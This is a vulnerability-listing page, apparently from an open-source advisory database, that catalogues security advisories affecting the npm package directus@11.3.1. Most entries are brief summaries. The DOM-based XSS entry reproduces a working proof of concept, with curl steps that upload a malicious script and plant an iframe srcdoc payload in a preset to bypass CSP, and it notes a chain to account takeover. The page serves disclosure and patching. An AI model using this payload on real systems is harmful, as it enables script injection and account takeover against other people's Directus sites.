Search for packages
| purl | pkg:npm/directus@11.3.1 |
| Vulnerability | Summary | Fixed by |
|---|---|---|
|
VCID-3kmj-b584-9ubg
Aliases: CVE-2026-35412 GHSA-qqmv-5p3g-px89 |
Affected by 6 other vulnerabilities. |
|
|
VCID-4wtt-tffj-bbeb
Aliases: CVE-2025-30225 GHSA-j8xj-7jff-46mx |
Affected by 22 other vulnerabilities. |
|
|
VCID-5qx9-76s2-6qfw
Aliases: CVE-2026-35442 GHSA-38hg-ww64-rrwc |
Affected by 0 other vulnerabilities. |
|
|
VCID-5u8r-s8tz-guhm
Aliases: CVE-2025-55746 GHSA-mv33-9f6j-pfmc |
Affected by 17 other vulnerabilities. |
|
|
VCID-7fzh-j76t-5kd3
Aliases: CVE-2025-30351 GHSA-56p6-qw3c-fq2g |
Affected by 22 other vulnerabilities. |
|
|
VCID-7mea-hn69-wuhu
Aliases: CVE-2025-30353 GHSA-fm3h-p9wm-h74h |
Affected by 22 other vulnerabilities. |
|
|
VCID-7zt3-dcnm-hqfb
Aliases: CVE-2025-64746 GHSA-9x5g-62gj-wqf2 |
Directus has Improper Permission Handling on Deleted Fields Directus does not properly clean up field-level permissions when a field is deleted. If a new field with the same name is created later, the system automatically re-applies the old permissions, which can lead to unauthorized access. |
Affected by 13 other vulnerabilities. |
|
VCID-anfb-6kfn-a7h7
Aliases: CVE-2026-26185 GHSA-jr94-gj3h-c8rf |
Directus Vulnerable to User Enumeration via Password Reset Timing Attack A timing-based user enumeration vulnerability exists in the password reset functionality. When an invalid reset_url parameter is provided, the response time differs by approximately 500ms between existing and non-existing users, enabling reliable user enumeration. |
Affected by 11 other vulnerabilities. |
|
VCID-axx3-a6te-d3cw
Aliases: GHSA-6q22-g298-grjh |
Directus: Unauthenticated Denial of Service via GraphQL Alias Amplification of Expensive Health Check Resolver ## Summary The GraphQL specification permits a single query to repeat the same field multiple times using aliases, with each alias resolved independently by default. Directus did not deduplicate resolver invocations within a single request, meaning each alias triggered a full, independent execution of the underlying resolver. The health check resolver ran all backend checks (database connectivity, cache, storage writes, and SMTP verification) on every invocation. Combined with unauthenticated access to the system GraphQL endpoint, this allowed an attacker to amplify resource consumption significantly from a single HTTP request, exhausting the database connection pool, storage I/O, and SMTP connections. ## Fix A request-scoped resolver deduplication mechanism was introduced and applied broadly across all GraphQL read resolvers, both system and items endpoints. When multiple aliases in a single request invoke the same resolver with identical arguments, only the first call executes; all subsequent aliases share its result. This eliminates the amplification factor regardless of how many aliases an attacker includes in a query. ## Impact - **Service degradation or outage:** Database connection pool exhaustion prevents all Directus operations for all users - **Storage I/O saturation:** Concurrent file writes can overwhelm disk I/O - **SMTP resource exhaustion:** Concurrent SMTP verification calls may overwhelm the mail server - **No authentication required:** Any network-accessible attacker can trigger this condition - **Single-request impact:** A single request is sufficient to cause significant resource consumption ## Credit This vulnerability was discovered and reported by [bugbunny.ai](https://bugbunny.ai). |
Affected by 0 other vulnerabilities. |
|
VCID-bh2g-b9dd-d3d9
Aliases: CVE-2025-53886 GHSA-f24x-rm6g-3w5v |
Affected by 18 other vulnerabilities. |
|
|
VCID-g34r-4mb9-afab
Aliases: CVE-2025-30352 GHSA-7wq3-jr35-275c |
Affected by 22 other vulnerabilities. |
|
|
VCID-gwwu-p9jt-eke3
Aliases: CVE-2026-35413 GHSA-wxwm-3fxv-mrvx |
Affected by 6 other vulnerabilities. |
|
|
VCID-hed8-anm5-ukc9
Aliases: CVE-2026-22032 GHSA-3573-4c68-g8cc |
Directus has open redirect in SAML An open redirect vulnerability exists in the Directus SAML authentication callback endpoint. The `RelayState` parameter is used in redirects without proper validation against an allowlist of permitted domains. |
Affected by 12 other vulnerabilities. |
|
VCID-hhwc-1jxe-7yaw
Aliases: CVE-2025-30350 GHSA-rv78-qqrq-73m5 |
Affected by 22 other vulnerabilities. |
|
|
VCID-hpbn-rr29-2yck
Aliases: CVE-2025-53885 GHSA-x3vm-88hf-gpxp |
Affected by 18 other vulnerabilities. |
|
|
VCID-jjth-fmsp-rfcj
Aliases: CVE-2025-64747 GHSA-vv2v-pw69-8crf |
Directus is Vulnerable to Stored Cross-site Scripting A stored cross-site scripting (XSS) vulnerability exists that allows users with `upload files` and `edit item` permissions to inject malicious JavaScript through the Block Editor interface. Attackers can bypass Content Security Policy (CSP) restrictions by combining file uploads with iframe srcdoc attributes, resulting in persistent XSS execution. |
Affected by 13 other vulnerabilities. |
|
VCID-mp82-hx9n-dufy
Aliases: CVE-2026-35408 GHSA-8m32-p958-jg99 |
Affected by 0 other vulnerabilities. |
|
|
VCID-na3v-me78-aqcg
Aliases: CVE-2025-64749 GHSA-cph6-524f-3hgr |
Directus Vulnerable to Information Leakage in Existing Collections An observable difference in error messaging was found in the Directus REST API. The `/items/{collection}` API returns different error messages for these two cases: 1. A user tries to access an existing collection which they are not authorized to access. 2. A user tries to access a non-existing collection. The two differing error messages leak the existence of collections to users which are not authorized to access these collections. |
Affected by 13 other vulnerabilities. |
|
VCID-nvha-b5tb-dqdt
Aliases: CVE-2025-64748 GHSA-8jpw-gpr4-8cmh |
Directus's conceal fields are searchable if read permissions enabled A vulnerability allows authenticated users to search concealed/sensitive fields when they have read permissions. While actual values remain masked (`****`), successful matches can be detected through returned records, enabling enumeration attacks on sensitive data. |
Affected by 13 other vulnerabilities. |
|
VCID-p1m5-v3rs-wbh7
Aliases: CVE-2026-35409 GHSA-wv3h-5fx7-966h |
Affected by 10 other vulnerabilities. |
|
|
VCID-prpm-x77m-cuha
Aliases: CVE-2026-35441 GHSA-ph52-67fq-75wj |
Affected by 0 other vulnerabilities. |
|
|
VCID-pwt9-krmn-7kdd
Aliases: CVE-2025-53889 GHSA-7cvf-pxgp-42fc |
Affected by 18 other vulnerabilities. |
|
|
VCID-tt5x-yjzf-4yab
Aliases: CVE-2026-35411 GHSA-q75c-4gmv-mg9x |
Affected by 6 other vulnerabilities. |
|
|
VCID-ukzv-q5tj-4faq
Aliases: CVE-2026-39943 GHSA-mvv8-v4jj-g47j |
Affected by 0 other vulnerabilities. |
|
|
VCID-wgag-36wa-qyay
Aliases: GHSA-9qrm-48qf-r2rw |
Directus has a DOM-Based cross-site scripting (XSS) via layout_options ### Impact Directus allows an authenticated attacker to save cross site scripting code to the database. This is possible because the application injects an attacker-controlled parameter that will be stored in the server and used by the client into an unsanitized DOM element. When chained with [CVE-2024-6534](https://github.com/directus/directus/security/advisories/GHSA-3fff-gqw3-vj86), it could result in account takeover. ### PoC To exploit this vulnerability, we need to do the following steps using a non-administrative, default role attacker account. 1. Upload the following JavaScript file. Using the upload functionality at `POST /files`. This PoC will show an alert message. ```js export TARGET_HOST="http://localhost:8055" export ATTACKER_EMAIL="malicious@malicious.com" export ATTACKER_PASSWORD="123456" root_dir=$(dirname $0) mkdir "${root_dir}/static" curl -s -k -o /dev/null -w "%{http_code}" -X 'POST' "${TARGET_HOST}/auth/login" \ -c "${root_dir}/static/attacker_directus_session_token" \ -H 'Content-Type: application/json' \ -d "{\"email\":\"${ATTACKER_EMAIL}\",\"password\":\"${ATTACKER_PASSWORD}\",\"mode\":\"session\"}" id_url_file=$(echo "alert('Successful DOM-based XSS')" | curl -s -k -X 'POST' "${TARGET_HOST}/files" \ -b "${root_dir}/static/attacker_directus_session_token" \ -F "file=@-;type=application/x-javascript;filename=poc.js" | jq -r ".data.id") ``` 2. Create a preset for a collection and store the preset ID. Or use a preset already created from GET /presets. The following example uses the direct_users preset. ``` attacker_user_id=$(curl -s -k "${TARGET_HOST}/users/me" \ -b "${root_dir}/static/attacker_directus_session_token" | jq -r ".data.id") curl -i -s -k -X 'POST' "${TARGET_HOST}/presets" \ -H 'Content-Type: application/json' \ -b "${root_dir}/static/attacker_directus_session_token" \ --data-binary "{\"layout\":\"cards\",\"bookmark\":null,\"role\":null,\"user\":\"${attacker_user_id}\",\"search\":null,\"filter\":null,\"layout_query\":{\"cards\":{\"sort\":[\"email\"]}},\"layout_options\":{\"cards\":{\"icon\":\"account_circle\",\"title\":\"<iframe srcdoc=\\\"<script src='http://localhost:8055/assets/${id_url_file}'> </script>\\\">\",\"subtitle\":\"{{ email }}\",\"size\":4}},\"refresh_interval\":null,\"icon\":\"bookmark\",\"color\":null,\"collection\":\"directus_users\"}" ``` When the user visits the view that uses the directus_users preset, the JavaScript file will be executed. Notes: Need to use an iframe to execute the malicious JavaScript file to bypass the CSP policies. The payload structure is `<iframe srcdoc=\"<script src='URL_MALICIOUS_FILE'> </script>\">`. We can target any collection that uses the vulnerable template structure that renders the layout option section. In this PoC, the target is the same user who sends the payload, but if the attacking user has permission to modify or create presets for other users or even if he does not have permissions but can chain with CVE-2024-6534, he can achieve an account takeover. |
Affected by 27 other vulnerabilities. |
|
VCID-wn2j-dtpz-hye1
Aliases: CVE-2025-53887 GHSA-rmjh-cf9q-pv7q |
Affected by 18 other vulnerabilities. |
|
|
VCID-xtcw-1jv1-s7ax
Aliases: CVE-2026-35410 GHSA-cf45-hxwj-4cfj |
Affected by 6 other vulnerabilities. |
|
|
VCID-y1vf-15p4-rfca
Aliases: CVE-2026-39942 GHSA-393c-p46r-7c95 |
Affected by 0 other vulnerabilities. |
| Vulnerability | Summary | Aliases |
|---|---|---|
| This package is not known to fix vulnerabilities. | ||